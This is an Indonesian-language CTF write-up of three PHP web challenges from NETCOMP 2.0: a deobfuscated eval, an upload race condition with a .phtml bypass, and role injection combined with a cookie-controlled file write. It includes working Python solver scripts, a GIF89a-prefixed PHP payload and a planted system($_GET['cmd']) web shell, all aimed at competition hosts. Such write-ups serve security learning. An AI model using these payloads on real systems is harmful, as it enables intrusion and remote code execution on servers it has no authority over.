NETCOMP 2.0

Last updated 11 months ago

NETCOMP 2.0

Participate with team Shelltatic

Name

Webfuscate

Attachment

Description

What is this?

Summary

Sebuah challenge website dimana setiap baris kode nya merupakan diobfuscate sehingga tidak mudah dibaca. Pada challenge ini merupakan obfuscate dari kode PHP, dimana nantinya harus dapat membaca kode tersebut dan bisa mendapatkan RCE, dari setiap kode yang telah diobfuscate yaitu melalui argument call.

Solution

Saat pertama kali diakses, target website akan memberikan sebuah highlight file dari website tersebut, yaitu sebagai berikut

<?php if (count(array_intersect_key(array_flip(range(0,6)), $_GET))===7) { $Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41"; $Lix = "fYz\x41TvWJS0G\x41ZnrL37K/R1FMI3MufnWRm94sH7sSJ\x62XuZ6FrL\x62yrZuqIJ2jidw48MIki0t\x63W0Xm2kNJ4gpdvrfj6s\x63O5ovQDzfN9vdz/jZ4SsF0uM4\x43j/\x627wnMqDi9\x62/YFGDjxJe/3J\x41iFw/Y\x43wZ\x42wJe"; eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));} else {highlight_file(__FILE__);} ?>

Dari kode tersebut, coba kita analisa satu persatu bagiannya, pertama bagian condition

if (count(array_intersect_key(array_flip(range(0,6)), $_GET))===7)

Pada kode ini mengecek pada value dari $_GET yang dikirim dari yaitu, $_GET[0] - $_GET[6], jika value tersebut tidak dipenuhi maka akan melakukan highlight source file tersebut.

Selanjutnya adalah bagian kode utama dari source tersebut, yaitu pada bagian berikut

$Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41";
$Lix = "fYz\x41TvWJS0G\x41ZnrL37K/R1FMI3MufnWRm94sH7sSJ\x62XuZ6FrL\x62yrZuqIJ2jidw48MIki0t\x63W0Xm2kNJ4gpdvrfj6s\x63O5ovQDzfN9vdz/jZ4SsF0uM4\x43j/\x627wnMqDi9\x62/YFGDjxJe/3J\x41iFw/Y\x43wZ\x42wJe";
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));

Terdapat variable $Cyto dan $Lix dan disini kita belum mengetahui arti dari variable tersebut, namun jika dilihat terdapat kode eval yang melakukan statement pada variable $Cyto.

Setelah melakukan analisa ternyata hasil dari statement tersebut adalah seperti berikut

Ternyata maksud dari variable $Cyto adalah seperti diatas, yaitu melakukan operasi statement lagi pada variable $Lix, kita analisa manual kembali, dan mendapatkan hasil sebagai berikut

Dan hasilnya adalah seperti diatas, dimana ternyata maksud dari source website tersebut sebenarnya adalah membentuk sebuah pola execution dari params $_GET, dimana value ini dapat di kontrol oleh user.

Oke, setelah mengetahui maksud tersebut, langsung saja kita lakukan exploit untuk dapat memenuhi dan membentuk pola execution yang valid.

Berikut, adalah solver dan pola yang ditemukan untuk bisa mendapatkan flag yang ada.

Read Directory

Read flag

Flag

netcomp{easy_php_obfuscation_shell}

TMP Storage

Attachment

Description

If i rename the extension of uploaded file, my web can't be hacked, right ?

Summary

Vulnerable terdapat ketika melakukan upload file, dimana file akan distore ke dalam temporary folder yang dimana isi dan ekstensi file tidak diubah (sesuai yang diupload), dan pada selisih 1 detik file tersebut akan dipindah ke real directory dengan secure name nya dan lalu temp file akan dihapus, dengan mekanisme tersebut terdapat vulnerability Race Condition untuk bisa mengakses file temporary dan mendapatkan RCE dengan mengupload file PHP.

Solution

Diberikan source code dari web tersebut, yaitu sebagai berikut

<?php

if (isset($_POST['submit'])) {
  $name = $_POST['name'];
  $mail = $_POST['mail'];
  $desc = $_POST['desc'];
  $imgs = basename($_FILES["image"]["name"]);
  $extn = explode('.', $imgs);
  $extn = end($extn);

  $tmp_dir = "tmp/";
  $target_dir = "uploads/";
  $fnames = time() . '-' . sha1($imgs);
  $target_file = $tmp_dir . $fnames . '.' . $extn;

  $check = getimagesize($_FILES["image"]["tmp_name"]);
  if ($check !== false) {
    $uploadOk = 1;
  } else {
    $uploadOk = 0;
  }
  echo $uploadOk;

  if (file_exists($target_file)) {
    $uploadOk = 0;
  }

  if ($_FILES["image"]["size"] > 500000) {
    $uploadOk = 0;
  }


  if (strtolower($extn) == "php") {
    $uploadOk = 0;
  }

  if ($uploadOk == 1) {
    move_uploaded_file($_FILES["image"]["tmp_name"], $target_file);
    sleep(1);

    $link = $target_dir . $fnames . ".jpg";
    copy($target_file, $link);
    unlink($target_file);
  }
}

Jika dilihat dari source code diatas, bisa diketahui terdapat mekanisme temporary store file, dimana dari file yang diupload hanya dirubah namanya, namun ekstensi dan isi filenya tidak diubah

  $tmp_dir = "tmp/";
  $target_dir = "uploads/";
  $fnames = time() . '-' . sha1($imgs);
  $target_file = $tmp_dir . $fnames . '.' . $extn; # temporary file stored

Namun, sebelum temp file tersebut disimpan, akan ada pengecekan terhadap kriteria file yang diupload

$check = getimagesize($_FILES["image"]["tmp_name"]);
if ($check !== false) {
  $uploadOk = 1;
} else {
  $uploadOk = 0;
}
echo $uploadOk;

if (file_exists($target_file)) {
  $uploadOk = 0;
}

if ($_FILES["image"]["size"] > 500000) {
  $uploadOk = 0;
}


if (strtolower($extn) == "php") {
  $uploadOk = 0;
}

Terdapat 4 pengecekan, yaitu

Get image size Ini dilakukan untuk memastikan yang diupload adalah file gambar yang memiliki width dan height, namun dapat dibypass dengan menggukan header dari file gif GIF89a;
File exists Make sure bahwa file yang diupload belum ada, namun tidak perlu kawatir karena nama file akan mengikuti current unix timestamp
Size file Kriteria file yang diupload tidak boleh lebih dari 500kb
Cek ekstensi Make sure bahwa ekstensi file yang diupload bukanlah php, namun disini masih bisa dibypass dengan mencoba menggunakan common name file yang dapat melakukan eksekusi php, seperti phtml, php5, php7, phar, dll.

Setelah pengecekan berhasil, maka temp file tersebut akan disimpan dan akan menunggu terlebih dahulu 1 detik, lalu memindahkan file tersebut ke real directory dengan mengubah ekstensi file tersebut menjadi jpg, lalu kemudian temp file akan dihapus

if ($uploadOk == 1) {
  move_uploaded_file($_FILES["image"]["tmp_name"], $target_file);
  sleep(1);

  $link = $target_dir . $fnames . ".jpg";
  copy($target_file, $link);
  unlink($target_file);
}

Oke, dari sini kemudian kita dapat membuat exploit untuk web tersebut dengan memanfaatkan vulnerability file upload dan race condition, lalu untuk melakukan bypass ekstensi file php dapat menggunakan ekstensi file phtml.

Berikut solver scriptnya

solver.py

import httpx
from time import time
import threading

client = httpx.Client(base_url="http://103.127.99.14:10005/")
unixtime = int(time()) - 10

filename = "exp.phtml"
hash = "8cf9cb66265b8ef69f25583db3b4b8900d96f79b"


def uploads():
    data = {"name": "test", "mail": "test@a.com", "desc": "test", "submit": "submit"}
    files = {"image": open(filename, "rb")}
    res = client.post("/", data=data, files=files)
    exit()


def searchfiles():
    global unixtime
    for _ in range(300):
        filename = f"{unixtime}-{hash}.phtml"
        res = client.get(f"/tmp/{filename}")
        if res.status_code != 404:
            print(res.text)
            break
        unixtime += 1


if __name__ == "__main__":
    threading.Thread(target=uploads).start()
    threading.Thread(target=searchfiles).start()

exp.html

GIF89a;
<?php

echo file_get_contents("/flag.txt");

Kemudian jalankan kode solver.py *jika tidak langsung mendapatkan flag, jalankan lagi hingga mendapatkan flag

Flag

netcomp{aku_adalah_kecepatan_dan_kecepatan_adalah_aku}

FunNotes

Attachment

Description

You can share your notes here with us!

Summary

Vulnerability pada challenge ini adalah terdapat broken code yang dibuat, dimana untuk penyimpanan datanya hanya menggunakan sebuah file, seperti penyimpanan user hanya menggunakan file txt dimana karena hal tersebut dan tidak ada filtering pada input maka user dapat melakukan abuse input untuk mendapatkan role yang diinginkan. Lainnya yaitu terdapat insecure cookie, dimana cookie yang dapat di kontrol oleh user dapat menyebabkan terjadinya arbitrary file write, untuk dimanfaatkan user mendapatkan RCE dari file yang di kontrol.

Solution

Pada website ini merupakan algoritma MVC, dimana tiap - tiap bagian dari logic akan disimpan sesuai peruntukkannya, untuk melihat route yang terdapat pada folder Routes dan file index.php

Routes/index.php

<?php

use App\Controllers\HomeController;
use App\Controllers\DashboardController;
use App\Router;

$router = new Router();

$router->get('/', HomeController::class, 'index');
$router->get('/login', HomeController::class, 'login');
$router->post('/login', HomeController::class, 'goLogin');
$router->get('/signup', HomeController::class, 'signup');
$router->post('/signup', HomeController::class, 'goSignup');
$router->get('/logout', HomeController::class, 'goLogout');

$router->get('/dashboard', DashboardController::class, 'index');

$router->post('/notes/create', DashboardController::class, 'create_notes');
$router->get('/notes/delete', DashboardController::class, 'delete_notes');
$router->get('/notes/export', DashboardController::class, 'export_notes');

$router->dispatch();

Pertama terdapat vulnerability pada saat melakukan registrasi user, yaitu pada contoller HomeController dan pada action function goSignup

Controllers/HomeController.php

class HomeController extends Controller {
    public function goSignup()
    {
        $new = new User($_POST["username"], $_POST["password"]);
        $new->save();
        $this->redirect("/login");
    }
}

Pada action tersebut memanggil model User dan melakukan save, berikut implementasi kode save tersebut

action func save - Controller/UserController.php

public function save(){
    $fh = fopen("/var/www/html/user.txt", "a");
    fwrite($fh, "$this->username:$this->password:user\n");
    fclose($fh);
}

Tidak ada sanitasi apapun, ini dapat dilakukan untuk bisa melakukan abusing value yang disimpan, misal untuk bisa mengubah role menjadi mod, value dari password bisa diisikan dengan inipassword:mod: dengan hal tersebut maka role yang digunakan adalah mod.

Setelah melakukan analisa yang cukup panjang, ternyata ada hal menarik pada fiutr export notes

public function export($owner)
{
    $current = json_decode(file_get_contents("/var/www/html/notes.json"));
    if (!isset($_COOKIE["lastExport"])) {
        $token = $this->create_export();
        setcookie("lastExport", json_encode($token), time() + 300, "/");
        $outputNote = [];
        foreach ($current as $index => $note) {
            if ($note->owner === $owner) {
                array_push($outputNote, $note);
                $this->save_progress($outputNote, $index, $token->token, $token->filepath);
            }
        }
    } else {
        $token = $this->get_progress($_COOKIE["lastExport"]);
        $outputNote = $token->notes;
        for ($i = $token->index; $i < count($current); $i++) {
            if ($current[$i]->owner === $owner) {
                array_push($outputNote, $current[$i]);
                $this->save_progress($outputNote, $i, $token->token, $token->filepath);
            }
        }
    }

    file_put_contents("/var/www/html/public/$token->filepath", json_encode($outputNote));
    unset($_COOKIE["lastExport"]);
    return $token->filepath;
}

Ternyata pada saat melakukan export terdapat pengecekan cache dari cookie user yaitu pada key lastExport. Dan jika dilihat pada bagian yang lain terdapat kode

file_put_contents("/var/www/html/public/$token->filepath", json_encode($outputNote));

Dimana kode tersebut melakukan penyimpanan file di /var/www/html/public dan nama file yang disimpan sesuai dengan $token->filepath lalu isi filenya adalah value json dari $outputNotes dimana ini jika diekstrak dari value $token->notes.

Karena cookie dapat dikontrol oleh user, sepertinya ini bisa menjadi vulnerability insecure cookie. Namun sebelumnya value cookie lastExport akan digunakan untuk mengambil value dari function get_progress. Oke mari telusuri function tersebut

public function get_progress($session)
{
    $data_session = json_decode($session);

    if (!file_exists("/var/www/html/progress.json")) {
        file_put_contents("/var/www/html/progress.json", "[]");
    }

    $current = json_decode(file_get_contents("/var/www/html/progress.json"));
    $found = 0;
    foreach ($current as $i => $progress) {
        if ($progress->token === $data_session->token) {
            $found = 1;
            break;
        }
    }

    if (!$found) {
        $progress = ["token" => $data_session->token, "filepath" => $data_session->filepath, "notes" => [], "index" => 0];
        array_push($current, $progress);
    }

    file_put_contents("/var/www/html/progress.json", json_encode($current));

    return $progress;
}

Bisa dilihat bahwa return dari function tersebut ternyata tidak mengubah value $filepath menjadi value lain, namun hanya saja terdapat penyesuaian value notes sesuai sesuai dengan value $token apakah sudah ada di cache progress. Tentu hal itu tidak masalah bisa kita lakukan request dengan beberapa kali dengan value notes yang mengandung arbitrary code php untuk melakukan arbitrary code execution

Lalu jika dilihat pada bagian lain, kita bisa mengetahui bagaiman struktur cookie yang harus disimpan, yaitu ada pada kode berikut

public function create_export()
{
    $fn = $this->randstr();
    $token = $this->randstr();
    return (object)[
        "filepath" => "export/$fn.json",
        "token" => $token,
        "index" => 0,
        "notes" => []
    ];
}

Dari situ bisa mendapatkan acuan bagaimana cara untuk menyimpan value kode nya.

Oke, saatnya melakukan exploit, yaitu dengan mengisi value filepath dengan ekstensi file php, lalu untuk token nya bisa random, ini hanya digunakan untuk melakukan cache progressnya, namun tentu saja harus dengan mengirimkan note yang isinya adalah untuk melakukan arbitrary code execution.

Setelah berhasil, kita bisa akses lokasi file yang ada sesuai dengan value filepath yang diberikan.

Berikut automation script solver dari challenge ini

solver.py

import httpx
import json
import re

client = httpx.Client(base_url="http://103.175.218.21:10003/")

creds = {"username": "rootkids", "password": "12321:mod:"}
cookies = {
    "lastExport": json.dumps(
        {"filepath": "rootkidsexploit.php", "token": "rootkids", "index": 0, "notes": []}
    )
}

client.cookies.update(cookies)

client.post("/signup", data=creds)
client.post("/login", data=creds)

note = {"title": "(=<?php system($_GET['cmd']); ?>=)", "text": "test"}
client.post("/notes/create", data=note, follow_redirects=True)

client.get("notes/export")

res = client.get("rootkidsexploit.php?cmd=cat /flag*")

if res.status_code != 404:
    flag = re.search(r"netcomp{.*}", res.text).group().split(",")[0].replace('"', "")
    print(flag)

Kode tersebut harus dijalankan minimal 2 kali jika tidak langsung keluar flag, dengan value token yang sebelumnya tidak ada pada cache websitenya, karena harus mendapatkan cache terlebih dahulu. Berikut hasilnya ketika dijalankan

Flag

netcomp{playing_note_is_fun_r1ght?!?}

Last updated 11 months ago